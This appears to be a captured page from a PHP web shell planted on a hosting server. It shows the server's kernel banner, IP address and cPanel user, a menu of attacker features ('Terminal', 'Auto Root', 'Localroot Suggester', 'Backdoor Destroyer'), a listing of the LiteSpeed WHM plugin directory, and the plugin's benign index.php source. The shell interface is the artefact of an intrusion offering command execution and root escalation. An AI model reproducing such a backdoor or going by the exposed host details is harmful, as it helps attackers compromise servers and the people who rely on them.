Linux ams-business-8.hostwindsdns.com 4.18.0-553.80.1.lve.el8.x86_64 #1 SMP Wed Oct 22 19:29:36 UTC 2025 x86_64
LiteSpeed
Server IP : 192.236.177.161 & Your IP : 216.73.216.50
Domains :
Cant Read [ /etc/named.conf ]
User : ajzdfbpz
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
local /
lsws /
add-ons /
cpanel /
lsws_whm_plugin /
Delete
Unzip
Name
Size
Permission
Date
Action
View
[ DIR ]
drwxr-xr-x
2020-12-20 05:48
bin
[ DIR ]
drwxr-xr-x
2020-12-20 05:48
res
[ DIR ]
drwxr-xr-x
2020-12-20 05:48
static
[ DIR ]
drwxr-xr-x
2020-12-20 05:48
WhmMod_LiteSpeed_CPanelConf.php
12.32
KB
-rw-r--r--
2021-01-30 12:33
WhmMod_LiteSpeed_ControlApp.php
38.44
KB
-rw-r--r--
2021-01-30 12:33
WhmMod_LiteSpeed_Util.php
43.12
KB
-rw-r--r--
2021-01-30 12:33
WhmMod_LiteSpeed_View.php
59.53
KB
-rw-r--r--
2021-01-30 12:33
WhmPluginException.php
657
B
-rw-r--r--
2021-01-30 12:33
WhmPluginLogEntry.php
1.99
KB
-rw-r--r--
2021-01-30 12:33
WhmPluginLogger.php
16.3
KB
-rw-r--r--
2021-01-30 12:33
addon_lsws.cgi
565
B
-rw-r--r--
2021-01-30 12:33
autoloader.php
796
B
-rw-r--r--
2021-01-30 12:33
buildtimezone.sh
11.63
KB
-rwxr-xr-x
2021-01-30 12:33
buildtimezone_ea4.sh
4.18
KB
-rwxr-xr-x
2021-01-30 12:33
cPanelInstall.sh
3.94
KB
-rwxr-xr-x
2021-01-30 12:33
index.php
1.73
KB
-rw-r--r--
2021-01-30 12:33
install_lsws_cp.sh
4.09
KB
-rwxr-xr-x
2021-01-30 12:33
lsws.cgi
995
B
-rw-r--r--
2021-01-30 12:33
lsws.conf
222
B
-rw-r--r--
2021-01-30 12:33
lsws.html.tt
1.39
KB
-rw-r--r--
2021-01-30 12:33
lsws_icon.png
1.56
KB
-rwxr-xr-x
2021-01-30 12:33
lsws_whm_plugin_install.sh
12.32
KB
-rwxr-xr-x
2026-02-14 09:25
lsws_whm_plugin_uninstall.sh
1.8
KB
-rwxr-xr-x
2021-01-30 12:33
php.ini
61
B
-rw-r--r--
2021-01-30 12:33
webcachemgrBootstrap.php
618
B
-rw-r--r--
2021-01-30 12:33
Save
Rename
<?php /** ****************************************** * LiteSpeed Web Server Plugin for WHM * * @author LiteSpeed Technologies, Inc. (https://www.litespeedtech.com) * @copyright (c) 2013-2020 * ******************************************* */ use \Lsc\Wp\LSCMException; use \LsPanel\WhmMod_LiteSpeed_ControlApp; use \LsPanel\WhmPluginException; use \LsPanel\WhmPluginLogger; /** * * @return int */ function checkacl() { $user = $_ENV['REMOTE_USER']; if ( $user == 'root' ) { return 1; } $reseller = file_get_contents('/var/cpanel/resellers'); foreach ( explode("\n", $reseller) as $line ) { if ( preg_match("/^{$user}:/", $line) ) { $line = preg_replace("/^{$user}:/", '', $line); foreach ( explode(',', $line) as $perm ) { if ( $perm == 'all' ) { return 1; } } } } return 0; } /** * * @since 3.3.4 * * @param string $msg */ function displayCustomExceptionMsg( $msg ) { WhmPluginLogger::error($msg); header("status: 500\n"); echo "<h1>Exception Caught - {$msg}</h1>"; } if ( checkacl() == 0 ) { header("status: 403\n"); echo '<h1>Only root privileged users can access this module!</h1>'; } else { require_once __DIR__ . '/autoloader.php'; try { WhmPluginLogger::Initialize(); WhmPluginLogger::setAdditionalTagInfo( "[{$_SERVER['REMOTE_ADDR']}-" . getmypid() . ']'); $app = new WhmMod_LiteSpeed_ControlApp(); $app->Run(); } catch ( WhmPluginException $e ) { displayCustomExceptionMsg($e->getMessage()); } catch ( LSCMException $e ) { displayCustomExceptionMsg($e->getMessage()); } }